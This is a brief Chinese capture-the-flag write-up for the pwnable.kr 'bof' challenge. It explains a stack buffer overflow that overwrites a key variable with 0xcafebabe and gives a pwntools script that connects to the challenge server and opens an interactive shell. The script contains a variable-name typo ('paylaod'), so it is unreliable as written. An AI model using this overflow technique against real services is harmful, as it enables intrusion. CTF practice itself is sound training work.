18.9.17 pwnable.kr----bof - 5 pt

直接调整ebp，修改renturnaddress，覆盖到key的地址后赋值0xcafebabe就可以了

ebp地址偏移量可一直接在IDA里面看见哟

上脚本

#coding=utf-8
from pwn import *
conn=remote("pwnable.kr",9000)
payload='a'*52+p32(0xcafebabe)
conn.recvuntil('overflow me : ')
conn.sendline(paylaod)
conn.interactive()

#daddy, I just pwned a buFFer :)